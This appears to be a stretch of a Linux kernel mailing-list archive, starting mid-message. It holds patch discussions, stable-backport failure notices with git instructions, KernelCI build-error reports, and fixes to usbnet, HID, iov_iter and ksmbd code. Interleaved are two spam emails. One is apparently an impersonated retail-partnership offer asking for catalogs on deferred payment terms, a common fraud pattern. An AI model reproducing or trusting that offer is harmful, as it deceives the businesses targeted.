Let me know if you are interested so that I can share the pricing for the same.
Kind Regards,
Jack Reacher
Sr. Marketing Manager
If you do not wish to receive this newsletter reply as “Unfollow”
On Tue, 12 Aug 2025 15:28:58 +0200 Przemek Kitszel wrote:
> Summary:
> Split ice_virtchnl.c into two more files (+headers), in a way
> that git-blame works better.
> Then move virtchnl files into a new subdir.
> No logic changes.
>
> I have developed (or discovered ;)) how to split a file in a way that
> both old and new are nice in terms of git-blame
> There were no much disscussion on [RFC], so I would like to propose
> to go forward with this approach.
>
> There is more commits needed to have it nice, so it forms a git-log vs
> git-blame tradeoff, but (after the brief moment that this is on the top)
> we spend orders of magnitude more time looking at the blame output (and
> commit messages linked from that) - so I find it much better to see
> actual logic changes instead of "move xx to yy" stuff (typical for
> "squashed/single-commit splits").
>
> Cherry-picks/rebases work the same with this method as with simple
> "squashed/single-commit" approach (literally all commits squashed into
> one (to have better git-log, but shitty git-blame output).
>
> Rationale for the split itself is, as usual, "file is big and we want to
> extend it".
>
> This series is available on my github (just rebased from any
> earlier mentions):
> https://github.com/pkitszel/linux/tree/virtchnl-split-Aug12
> (the simple git-email view flattens this series, removing two
> merges from the view).
>
>
> [RFC]:
> https://lore.kernel.org/netdev/5b94d14e-a0e7-47bd-82fc-c85171cbf26e@intel.c…
>
> (I would really look at my fork via your preferred git interaction tool
> instead of looking at the patches below).
UI tools aside I wish you didn't cut off the diffstat from the cover
letter :/ It'd make it much easier to understand what you're splitting.
Greg, Sasha, I suspect stable will suffer the most from any file split /
movement. Do you have any recommendation on what should be allowed?
The patch titled
Subject: iov_iter: iterate_folioq: fix handling of offset >= folio size
has been added to the -mm mm-hotfixes-unstable branch. Its filename is
iov_iter-iterate_folioq-fix-handling-of-offset-=-folio-size.patch
This patch will shortly appear at
https://git.kernel.org/pub/scm/linux/kernel/git/akpm/25-new.git/tree/patche…
This patch will later appear in the mm-hotfixes-unstable branch at
git://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm
Before you just go and hit "reply", please:
a) Consider who else should be cc'ed
b) Prefer to cc a suitable mailing list as well
c) Ideally: find the original patch on the mailing list and do a
reply-to-all to that, adding suitable additional cc's
*** Remember to use Documentation/process/submit-checklist.rst when testing your code ***
The -mm tree is included into linux-next via the mm-everything
branch at git://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm
and is updated there every 2-3 working days
------------------------------------------------------
From: Dominique Martinet <asmadeus(a)codewreck.org>
Subject: iov_iter: iterate_folioq: fix handling of offset >= folio size
Date: Mon, 11 Aug 2025 16:39:05 +0900
So we've had this regression in 9p for.. almost a year, which is way too
long, but there was no "easy" reproducer until yesterday (thank you
again!!)
It turned out to be a bug with iov_iter on folios,
iov_iter_get_pages_alloc2() would advance the iov_iter correctly up to the
end edge of a folio and the later copy_to_iter() fails on the
iterate_folioq() bug.
Happy to consider alternative ways of fixing this, now there's a
reproducer it's all much clearer; for the bug to be visible we basically
need to make and IO with non-contiguous folios in the iov_iter which is
not obvious to test with synthetic VMs, with size that triggers a
zero-copy read followed by a non-zero-copy read.
It's apparently possible to get an iov forwarded all the way up to the end
of the current page we're looking at, e.g.
(gdb) p *iter
$24 = {iter_type = 4 '\004', nofault = false, data_source = false, iov_offset = 4096, {__ubuf_iovec = {
iov_base = 0xffff88800f5bc000, iov_len = 655}, {{__iov = 0xffff88800f5bc000, kvec = 0xffff88800f5bc000,
bvec = 0xffff88800f5bc000, folioq = 0xffff88800f5bc000, xarray = 0xffff88800f5bc000,
ubuf = 0xffff88800f5bc000}, count = 655}}, {nr_segs = 2, folioq_slot = 2 '\002', xarray_start = 2}}
Where iov_offset is 4k with 4k-sized folios
This should have been because we're only in the 2nd slot and there's
another one after this, but iterate_folioq should not try to map a folio
that skips the whole size, and more importantly part here does not end up
zero (because 'PAGE_SIZE - skip % PAGE_SIZE' ends up PAGE_SIZE and not
zero..), so skip forward to the "advance to next folio" code.
Link: https://lkml.kernel.org/r/20250811-iot_iter_folio-v1-0-d9c223adf93c@codewre…
Link: https://lkml.kernel.org/r/20250811-iot_iter_folio-v1-1-d9c223adf93c@codewre…
Link: https://lkml.kernel.org/r/D4LHHUNLG79Y.12PI0X6BEHRHW@mbosch.me/
Fixes: db0aa2e9566f ("mm: Define struct folio_queue and ITER_FOLIOQ to handle a sequence of folios")
Signed-off-by: Dominique Martinet <asmadeus(a)codewreck.org>
Reported-by: Maximilian Bosch <maximilian(a)mbosch.me>
Reported-by: Ryan Lahfa <ryan(a)lahfa.xyz>
Reported-by: Christian Theune <ct(a)flyingcircus.io>
Reported-by: Arnout Engelen <arnout(a)bzzt.net>
Cc: Al Viro <viro(a)zeniv.linux.org.uk>
Cc: Christian Brauner <brauner(a)kernel.org>
Cc: David Howells <dhowells(a)redhat.com>
Cc: Ryan Lahfa <ryan(a)lahfa.xyz>
Cc: <stable(a)vger.kernel.org> [v6.12+]
Signed-off-by: Andrew Morton <akpm(a)linux-foundation.org>
---
include/linux/iov_iter.h | 3 +++
1 file changed, 3 insertions(+)
--- a/include/linux/iov_iter.h~iov_iter-iterate_folioq-fix-handling-of-offset-=-folio-size
+++ a/include/linux/iov_iter.h
@@ -168,6 +168,8 @@ size_t iterate_folioq(struct iov_iter *i
break;
fsize = folioq_folio_size(folioq, slot);
+ if (skip >= fsize)
+ goto next;
base = kmap_local_folio(folio, skip);
part = umin(len, PAGE_SIZE - skip % PAGE_SIZE);
remain = step(base, progress, part, priv, priv2);
@@ -177,6 +179,7 @@ size_t iterate_folioq(struct iov_iter *i
progress += consumed;
skip += consumed;
if (skip >= fsize) {
+next:
skip = 0;
slot++;
if (slot == folioq_nr_slots(folioq) && folioq->next) {
_
Patches currently in -mm which might be from asmadeus(a)codewreck.org are
iov_iter-iterate_folioq-fix-handling-of-offset-=-folio-size.patch
iov_iter-iov_folioq_get_pages-dont-leave-empty-slot-behind.patch
The patch below does not apply to the 6.12-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.12.y
git checkout FETCH_HEAD
git cherry-pick -x c061046fe9ce3ff31fb9a807144a2630ad349c17
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081201-cupid-custodian-14e8@gregkh' --subject-prefix 'PATCH 6.12.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From c061046fe9ce3ff31fb9a807144a2630ad349c17 Mon Sep 17 00:00:00 2001
From: Aditya Garg <gargaditya08(a)live.com>
Date: Mon, 30 Jun 2025 12:37:13 +0000
Subject: [PATCH] HID: apple: avoid setting up battery timer for devices
without battery
Currently, the battery timer is set up for all devices using hid-apple,
irrespective of whether they actually have a battery or not.
APPLE_RDESC_BATTERY is a quirk that indicates the device has a battery
and needs the battery timer. This patch checks for this quirk before
setting up the timer, ensuring that only devices with a battery will
have the timer set up.
Fixes: 6e143293e17a ("HID: apple: Report Magic Keyboard battery over USB")
Cc: stable(a)vger.kernel.org
Signed-off-by: Aditya Garg <gargaditya08(a)live.com>
Signed-off-by: Jiri Kosina <jkosina(a)suse.com>
diff --git a/drivers/hid/hid-apple.c b/drivers/hid/hid-apple.c
index 0639b1f43d88..8ab15a8f3524 100644
--- a/drivers/hid/hid-apple.c
+++ b/drivers/hid/hid-apple.c
@@ -933,10 +933,12 @@ static int apple_probe(struct hid_device *hdev,
return ret;
}
- timer_setup(&asc->battery_timer, apple_battery_timer_tick, 0);
- mod_timer(&asc->battery_timer,
- jiffies + msecs_to_jiffies(APPLE_BATTERY_TIMEOUT_MS));
- apple_fetch_battery(hdev);
+ if (quirks & APPLE_RDESC_BATTERY) {
+ timer_setup(&asc->battery_timer, apple_battery_timer_tick, 0);
+ mod_timer(&asc->battery_timer,
+ jiffies + msecs_to_jiffies(APPLE_BATTERY_TIMEOUT_MS));
+ apple_fetch_battery(hdev);
+ }
if (quirks & APPLE_BACKLIGHT_CTL)
apple_backlight_init(hdev);
@@ -950,7 +952,9 @@ static int apple_probe(struct hid_device *hdev,
return 0;
out_err:
- timer_delete_sync(&asc->battery_timer);
+ if (quirks & APPLE_RDESC_BATTERY)
+ timer_delete_sync(&asc->battery_timer);
+
hid_hw_stop(hdev);
return ret;
}
@@ -959,7 +963,8 @@ static void apple_remove(struct hid_device *hdev)
{
struct apple_sc *asc = hid_get_drvdata(hdev);
- timer_delete_sync(&asc->battery_timer);
+ if (asc->quirks & APPLE_RDESC_BATTERY)
+ timer_delete_sync(&asc->battery_timer);
hid_hw_stop(hdev);
}
The patch below does not apply to the 6.6-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.6.y
git checkout FETCH_HEAD
git cherry-pick -x c061046fe9ce3ff31fb9a807144a2630ad349c17
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081201-undamaged-referee-deb6@gregkh' --subject-prefix 'PATCH 6.6.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From c061046fe9ce3ff31fb9a807144a2630ad349c17 Mon Sep 17 00:00:00 2001
From: Aditya Garg <gargaditya08(a)live.com>
Date: Mon, 30 Jun 2025 12:37:13 +0000
Subject: [PATCH] HID: apple: avoid setting up battery timer for devices
without battery
Currently, the battery timer is set up for all devices using hid-apple,
irrespective of whether they actually have a battery or not.
APPLE_RDESC_BATTERY is a quirk that indicates the device has a battery
and needs the battery timer. This patch checks for this quirk before
setting up the timer, ensuring that only devices with a battery will
have the timer set up.
Fixes: 6e143293e17a ("HID: apple: Report Magic Keyboard battery over USB")
Cc: stable(a)vger.kernel.org
Signed-off-by: Aditya Garg <gargaditya08(a)live.com>
Signed-off-by: Jiri Kosina <jkosina(a)suse.com>
diff --git a/drivers/hid/hid-apple.c b/drivers/hid/hid-apple.c
index 0639b1f43d88..8ab15a8f3524 100644
--- a/drivers/hid/hid-apple.c
+++ b/drivers/hid/hid-apple.c
@@ -933,10 +933,12 @@ static int apple_probe(struct hid_device *hdev,
return ret;
}
- timer_setup(&asc->battery_timer, apple_battery_timer_tick, 0);
- mod_timer(&asc->battery_timer,
- jiffies + msecs_to_jiffies(APPLE_BATTERY_TIMEOUT_MS));
- apple_fetch_battery(hdev);
+ if (quirks & APPLE_RDESC_BATTERY) {
+ timer_setup(&asc->battery_timer, apple_battery_timer_tick, 0);
+ mod_timer(&asc->battery_timer,
+ jiffies + msecs_to_jiffies(APPLE_BATTERY_TIMEOUT_MS));
+ apple_fetch_battery(hdev);
+ }
if (quirks & APPLE_BACKLIGHT_CTL)
apple_backlight_init(hdev);
@@ -950,7 +952,9 @@ static int apple_probe(struct hid_device *hdev,
return 0;
out_err:
- timer_delete_sync(&asc->battery_timer);
+ if (quirks & APPLE_RDESC_BATTERY)
+ timer_delete_sync(&asc->battery_timer);
+
hid_hw_stop(hdev);
return ret;
}
@@ -959,7 +963,8 @@ static void apple_remove(struct hid_device *hdev)
{
struct apple_sc *asc = hid_get_drvdata(hdev);
- timer_delete_sync(&asc->battery_timer);
+ if (asc->quirks & APPLE_RDESC_BATTERY)
+ timer_delete_sync(&asc->battery_timer);
hid_hw_stop(hdev);
}
The patch below does not apply to the 6.1-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.1.y
git checkout FETCH_HEAD
git cherry-pick -x c061046fe9ce3ff31fb9a807144a2630ad349c17
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081202-delirium-stubborn-aa45@gregkh' --subject-prefix 'PATCH 6.1.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From c061046fe9ce3ff31fb9a807144a2630ad349c17 Mon Sep 17 00:00:00 2001
From: Aditya Garg <gargaditya08(a)live.com>
Date: Mon, 30 Jun 2025 12:37:13 +0000
Subject: [PATCH] HID: apple: avoid setting up battery timer for devices
without battery
Currently, the battery timer is set up for all devices using hid-apple,
irrespective of whether they actually have a battery or not.
APPLE_RDESC_BATTERY is a quirk that indicates the device has a battery
and needs the battery timer. This patch checks for this quirk before
setting up the timer, ensuring that only devices with a battery will
have the timer set up.
Fixes: 6e143293e17a ("HID: apple: Report Magic Keyboard battery over USB")
Cc: stable(a)vger.kernel.org
Signed-off-by: Aditya Garg <gargaditya08(a)live.com>
Signed-off-by: Jiri Kosina <jkosina(a)suse.com>
diff --git a/drivers/hid/hid-apple.c b/drivers/hid/hid-apple.c
index 0639b1f43d88..8ab15a8f3524 100644
--- a/drivers/hid/hid-apple.c
+++ b/drivers/hid/hid-apple.c
@@ -933,10 +933,12 @@ static int apple_probe(struct hid_device *hdev,
return ret;
}
- timer_setup(&asc->battery_timer, apple_battery_timer_tick, 0);
- mod_timer(&asc->battery_timer,
- jiffies + msecs_to_jiffies(APPLE_BATTERY_TIMEOUT_MS));
- apple_fetch_battery(hdev);
+ if (quirks & APPLE_RDESC_BATTERY) {
+ timer_setup(&asc->battery_timer, apple_battery_timer_tick, 0);
+ mod_timer(&asc->battery_timer,
+ jiffies + msecs_to_jiffies(APPLE_BATTERY_TIMEOUT_MS));
+ apple_fetch_battery(hdev);
+ }
if (quirks & APPLE_BACKLIGHT_CTL)
apple_backlight_init(hdev);
@@ -950,7 +952,9 @@ static int apple_probe(struct hid_device *hdev,
return 0;
out_err:
- timer_delete_sync(&asc->battery_timer);
+ if (quirks & APPLE_RDESC_BATTERY)
+ timer_delete_sync(&asc->battery_timer);
+
hid_hw_stop(hdev);
return ret;
}
@@ -959,7 +963,8 @@ static void apple_remove(struct hid_device *hdev)
{
struct apple_sc *asc = hid_get_drvdata(hdev);
- timer_delete_sync(&asc->battery_timer);
+ if (asc->quirks & APPLE_RDESC_BATTERY)
+ timer_delete_sync(&asc->battery_timer);
hid_hw_stop(hdev);
}
--
Hi,
PERDIS SUPER U is a leading retail group in France with numerous
outlets across the country. After reviewing your company profile and
products, we’re very interested in establishing a long-term partnership.
Kindly share your product catalog or website so we can review your
offerings and pricing. We are ready to place orders and begin
cooperation.Please note: Our payment terms are SWIFT, 14 days after
delivery.
Looking forward to your response.
Best regards,
Dominique Schelcher
Director, PERDIS SUPER U
RUE DE SAVOIE, 45600 SAINT-PÈRE-SUR-LOIRE
VAT: FR65380071464
www.magasins-u.com
On 2025-08-12 16:32, Rafael J. Wysocki wrote:
>
> Applied as 6.17-rc material and sorry for the delay (I was offline).
>
> Thanks!
Thanks!
Tagging stable@ so we're hopefully in time for 6.16.1.
This is an updated version of [1], just for 5.4, which was waiting on
commit 87c4e1459e80 ("ARM: 9448/1: Use an absolute path to unified.h in
KBUILD_AFLAGS") to avoid regressing the build [2].
These changes are needed there due to an upstream LLVM change [3] that
changes the behavior of -Qunused-arguments with unknown target options,
which is only used in 6.1 and older since I removed it in commit
8d9acfce3332 ("kbuild: Stop using '-Qunused-arguments' with clang") in
6.3.
Please let me know if there are any issues.
[1]: https://lore.kernel.org/20250604233141.GA2374479@ax162/
[2]: https://lore.kernel.org/CACo-S-1qbCX4WAVFA63dWfHtrRHZBTyyr2js8Lx=Az03XHTTHg…
[3]: https://github.com/llvm/llvm-project/commit/a4b2f4a72aa9b4655ecc723838830e0…
Masahiro Yamada (1):
kbuild: add $(CLANG_FLAGS) to KBUILD_CPPFLAGS
Nathan Chancellor (4):
ARM: 9448/1: Use an absolute path to unified.h in KBUILD_AFLAGS
mips: Include KBUILD_CPPFLAGS in CHECKFLAGS invocation
kbuild: Add CLANG_FLAGS to as-instr
kbuild: Add KBUILD_CPPFLAGS to as-option invocation
Nick Desaulniers (1):
kbuild: Update assembler calls to use proper flags and language target
Makefile | 3 +--
arch/arm/Makefile | 2 +-
arch/mips/Makefile | 2 +-
scripts/Kbuild.include | 8 ++++----
4 files changed, 7 insertions(+), 8 deletions(-)
base-commit: 04b7726c3cdd2fb4da040c2b898bcf405ed607bd
--
2.50.1
Hello,
New build issue found on stable-rc/linux-5.15.y:
---
implicit declaration of function 'guest_cpu_cap_has' [-Werror,-Wimplicit-function-declaration] in arch/x86/kvm/vmx/vmx.o (arch/x86/kvm/vmx/vmx.c) [logspec:kbuild,kbuild.compiler.error]
---
- dashboard: https://d.kernelci.org/i/maestro:ffd38b22f4d3da011e2d8142fcd9b848083d18fb
- giturl: https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable-rc.git
- commit HEAD: 62f5d931273c281f86db2d54bfa496b2a2b400cc
Log excerpt:
=====================================================
arch/x86/kvm/vmx/vmx.c:2022:25: error: implicit declaration of function 'guest_cpu_cap_has' [-Werror,-Wimplicit-function-declaration]
2022 | (host_initiated || guest_cpu_cap_has(vcpu, X86_FEATURE_RTM)))
| ^
arch/x86/kvm/vmx/vmx.c:2022:25: note: did you mean 'guest_cpuid_has'?
./arch/x86/kvm/cpuid.h:84:29: note: 'guest_cpuid_has' declared here
84 | static __always_inline bool guest_cpuid_has(struct kvm_vcpu *vcpu,
| ^
arch/x86/kvm/vmx/vmx.c:2022:7: error: use of undeclared identifier 'host_initiated'
2022 | (host_initiated || guest_cpu_cap_has(vcpu, X86_FEATURE_RTM)))
| ^
2 errors generated.
=====================================================
# Builds where the incident occurred:
## i386_defconfig+allmodconfig+CONFIG_FRAME_WARN=2048 on (i386):
- compiler: clang-17
- dashboard: https://d.kernelci.org/build/maestro:689b7884233e484a3f8f254e
#kernelci issue maestro:ffd38b22f4d3da011e2d8142fcd9b848083d18fb
Reported-by: kernelci.org bot <bot(a)kernelci.org>
--
This is an experimental report format. Please send feedback in!
Talk to us at kernelci(a)lists.linux.dev
Made with love by the KernelCI team - https://kernelci.org
The commit in the Fixes tag breaks my laptop (found by git bisect).
My home RJ45 LAN cable cannot connect after that commit.
The call to netif_carrier_on() should be done when netif_carrier_ok()
is false. Not when it's true. Because calling netif_carrier_on() when
__LINK_STATE_NOCARRIER is not set actually does nothing.
Cc: Armando Budianto <sprite(a)gnuweeb.org>
Cc: stable(a)vger.kernel.org
Closes: https://lore.kernel.org/netdev/0752dee6-43d6-4e1f-81d2-4248142cccd2@gnuweeb…
Fixes: 0d9cfc9b8cb1 ("net: usbnet: Avoid potential RCU stall on LINK_CHANGE event")
Signed-off-by: Ammar Faizi <ammarfaizi2(a)gnuweeb.org>
---
v2:
- Rebase on top of the latest netdev/net tree. The previous patch was
based on 0d9cfc9b8cb1. Line numbers have changed since then.
drivers/net/usb/usbnet.c | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/drivers/net/usb/usbnet.c b/drivers/net/usb/usbnet.c
index a38ffbf4b3f0..a1827684b92c 100644
--- a/drivers/net/usb/usbnet.c
+++ b/drivers/net/usb/usbnet.c
@@ -1114,31 +1114,31 @@ static const struct ethtool_ops usbnet_ethtool_ops = {
};
/*-------------------------------------------------------------------------*/
static void __handle_link_change(struct usbnet *dev)
{
if (!test_bit(EVENT_DEV_OPEN, &dev->flags))
return;
if (!netif_carrier_ok(dev->net)) {
+ if (test_and_clear_bit(EVENT_LINK_CARRIER_ON, &dev->flags))
+ netif_carrier_on(dev->net);
+
/* kill URBs for reading packets to save bus bandwidth */
unlink_urbs(dev, &dev->rxq);
/*
* tx_timeout will unlink URBs for sending packets and
* tx queue is stopped by netcore after link becomes off
*/
} else {
- if (test_and_clear_bit(EVENT_LINK_CARRIER_ON, &dev->flags))
- netif_carrier_on(dev->net);
-
/* submitting URBs for reading packets */
queue_work(system_bh_wq, &dev->bh_work);
}
/* hard_mtu or rx_urb_size may change during link change */
usbnet_update_max_qlen(dev);
clear_bit(EVENT_LINK_CHANGE, &dev->flags);
}
--
Ammar Faizi
The patch below does not apply to the 6.12-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.12.y
git checkout FETCH_HEAD
git cherry-pick -x a6b87bfc2ab5bccb7ad953693c85d9062aef3fdd
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081232-clear-humility-0629@gregkh' --subject-prefix 'PATCH 6.12.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From a6b87bfc2ab5bccb7ad953693c85d9062aef3fdd Mon Sep 17 00:00:00 2001
From: Alan Stern <stern(a)rowland.harvard.edu>
Date: Wed, 23 Jul 2025 10:37:04 -0400
Subject: [PATCH] HID: core: Harden s32ton() against conversion to 0 bits
Testing by the syzbot fuzzer showed that the HID core gets a
shift-out-of-bounds exception when it tries to convert a 32-bit
quantity to a 0-bit quantity. Ideally this should never occur, but
there are buggy devices and some might have a report field with size
set to zero; we shouldn't reject the report or the device just because
of that.
Instead, harden the s32ton() routine so that it returns a reasonable
result instead of crashing when it is called with the number of bits
set to 0 -- the same as what snto32() does.
Signed-off-by: Alan Stern <stern(a)rowland.harvard.edu>
Reported-by: syzbot+b63d677d63bcac06cf90(a)syzkaller.appspotmail.com
Closes: https://lore.kernel.org/linux-usb/68753a08.050a0220.33d347.0008.GAE@google.…
Tested-by: syzbot+b63d677d63bcac06cf90(a)syzkaller.appspotmail.com
Fixes: dde5845a529f ("[PATCH] Generic HID layer - code split")
Cc: stable(a)vger.kernel.org
Link: https://patch.msgid.link/613a66cd-4309-4bce-a4f7-2905f9bce0c9@rowland.harva…
Signed-off-by: Benjamin Tissoires <bentiss(a)kernel.org>
diff --git a/drivers/hid/hid-core.c b/drivers/hid/hid-core.c
index ef1f79951d9b..f7d4efcae603 100644
--- a/drivers/hid/hid-core.c
+++ b/drivers/hid/hid-core.c
@@ -66,8 +66,12 @@ static s32 snto32(__u32 value, unsigned int n)
static u32 s32ton(__s32 value, unsigned int n)
{
- s32 a = value >> (n - 1);
+ s32 a;
+ if (!value || !n)
+ return 0;
+
+ a = value >> (n - 1);
if (a && a != -1)
return value < 0 ? 1 << (n - 1) : (1 << (n - 1)) - 1;
return value & ((1 << n) - 1);
The patch below does not apply to the 5.15-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.15.y
git checkout FETCH_HEAD
git cherry-pick -x 8e7d178d06e8937454b6d2f2811fa6a15656a214
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081251-slang-colony-6d23@gregkh' --subject-prefix 'PATCH 5.15.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 8e7d178d06e8937454b6d2f2811fa6a15656a214 Mon Sep 17 00:00:00 2001
From: Thorsten Blum <thorsten.blum(a)linux.dev>
Date: Wed, 6 Aug 2025 03:03:49 +0200
Subject: [PATCH] smb: server: Fix extension string in
ksmbd_extract_shortname()
In ksmbd_extract_shortname(), strscpy() is incorrectly called with the
length of the source string (excluding the NUL terminator) rather than
the size of the destination buffer. This results in "__" being copied
to 'extension' rather than "___" (two underscores instead of three).
Use the destination buffer size instead to ensure that the string "___"
(three underscores) is copied correctly.
Cc: stable(a)vger.kernel.org
Fixes: e2f34481b24d ("cifsd: add server-side procedures for SMB3")
Signed-off-by: Thorsten Blum <thorsten.blum(a)linux.dev>
Acked-by: Namjae Jeon <linkinjeon(a)kernel.org>
Signed-off-by: Steve French <stfrench(a)microsoft.com>
diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
index 425c756bcfb8..b23203a1c286 100644
--- a/fs/smb/server/smb_common.c
+++ b/fs/smb/server/smb_common.c
@@ -515,7 +515,7 @@ int ksmbd_extract_shortname(struct ksmbd_conn *conn, const char *longname,
p = strrchr(longname, '.');
if (p == longname) { /*name starts with a dot*/
- strscpy(extension, "___", strlen("___"));
+ strscpy(extension, "___", sizeof(extension));
} else {
if (p) {
p++;
The patch below does not apply to the 6.1-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.1.y
git checkout FETCH_HEAD
git cherry-pick -x 8e7d178d06e8937454b6d2f2811fa6a15656a214
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081249-afar-gesture-7178@gregkh' --subject-prefix 'PATCH 6.1.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 8e7d178d06e8937454b6d2f2811fa6a15656a214 Mon Sep 17 00:00:00 2001
From: Thorsten Blum <thorsten.blum(a)linux.dev>
Date: Wed, 6 Aug 2025 03:03:49 +0200
Subject: [PATCH] smb: server: Fix extension string in
ksmbd_extract_shortname()
In ksmbd_extract_shortname(), strscpy() is incorrectly called with the
length of the source string (excluding the NUL terminator) rather than
the size of the destination buffer. This results in "__" being copied
to 'extension' rather than "___" (two underscores instead of three).
Use the destination buffer size instead to ensure that the string "___"
(three underscores) is copied correctly.
Cc: stable(a)vger.kernel.org
Fixes: e2f34481b24d ("cifsd: add server-side procedures for SMB3")
Signed-off-by: Thorsten Blum <thorsten.blum(a)linux.dev>
Acked-by: Namjae Jeon <linkinjeon(a)kernel.org>
Signed-off-by: Steve French <stfrench(a)microsoft.com>
diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
index 425c756bcfb8..b23203a1c286 100644
--- a/fs/smb/server/smb_common.c
+++ b/fs/smb/server/smb_common.c
@@ -515,7 +515,7 @@ int ksmbd_extract_shortname(struct ksmbd_conn *conn, const char *longname,
p = strrchr(longname, '.');
if (p == longname) { /*name starts with a dot*/
- strscpy(extension, "___", strlen("___"));
+ strscpy(extension, "___", sizeof(extension));
} else {
if (p) {
p++;
The patch below does not apply to the 6.6-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.6.y
git checkout FETCH_HEAD
git cherry-pick -x 8e7d178d06e8937454b6d2f2811fa6a15656a214
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081246-wasting-private-5dd8@gregkh' --subject-prefix 'PATCH 6.6.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 8e7d178d06e8937454b6d2f2811fa6a15656a214 Mon Sep 17 00:00:00 2001
From: Thorsten Blum <thorsten.blum(a)linux.dev>
Date: Wed, 6 Aug 2025 03:03:49 +0200
Subject: [PATCH] smb: server: Fix extension string in
ksmbd_extract_shortname()
In ksmbd_extract_shortname(), strscpy() is incorrectly called with the
length of the source string (excluding the NUL terminator) rather than
the size of the destination buffer. This results in "__" being copied
to 'extension' rather than "___" (two underscores instead of three).
Use the destination buffer size instead to ensure that the string "___"
(three underscores) is copied correctly.
Cc: stable(a)vger.kernel.org
Fixes: e2f34481b24d ("cifsd: add server-side procedures for SMB3")
Signed-off-by: Thorsten Blum <thorsten.blum(a)linux.dev>
Acked-by: Namjae Jeon <linkinjeon(a)kernel.org>
Signed-off-by: Steve French <stfrench(a)microsoft.com>
diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
index 425c756bcfb8..b23203a1c286 100644
--- a/fs/smb/server/smb_common.c
+++ b/fs/smb/server/smb_common.c
@@ -515,7 +515,7 @@ int ksmbd_extract_shortname(struct ksmbd_conn *conn, const char *longname,
p = strrchr(longname, '.');
if (p == longname) { /*name starts with a dot*/
- strscpy(extension, "___", strlen("___"));
+ strscpy(extension, "___", sizeof(extension));
} else {
if (p) {
p++;
Hello,
New build issue found on stable-rc/linux-5.15.y:
---
‘host_initiated’ undeclared (first use in this function) in arch/x86/kvm/vmx/vmx.o (arch/x86/kvm/vmx/vmx.c) [logspec:kbuild,kbuild.compiler.error]
---
- dashboard: https://d.kernelci.org/i/maestro:f3f2b1eabef22152c0bfbd86fe01d397c2c3478a
- giturl: https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable-rc.git
- commit HEAD: 62f5d931273c281f86db2d54bfa496b2a2b400cc
Log excerpt:
=====================================================
arch/x86/kvm/vmx/vmx.c:2022:14: error: ‘host_initiated’ undeclared (first use in this function)
2022 | (host_initiated || guest_cpu_cap_has(vcpu, X86_FEATURE_RTM)))
| ^~~~~~~~~~~~~~
arch/x86/kvm/vmx/vmx.c:2022:14: note: each undeclared identifier is reported only once for each function it appears in
arch/x86/kvm/vmx/vmx.c:2022:32: error: implicit declaration of function ‘guest_cpu_cap_has’; did you mean ‘guest_cpuid_has’? [-Werror=implicit-function-declaration]
2022 | (host_initiated || guest_cpu_cap_has(vcpu, X86_FEATURE_RTM)))
| ^~~~~~~~~~~~~~~~~
| guest_cpuid_has
CC fs/kernfs/dir.o
CC mm/msync.o
CC security/landlock/fs.o
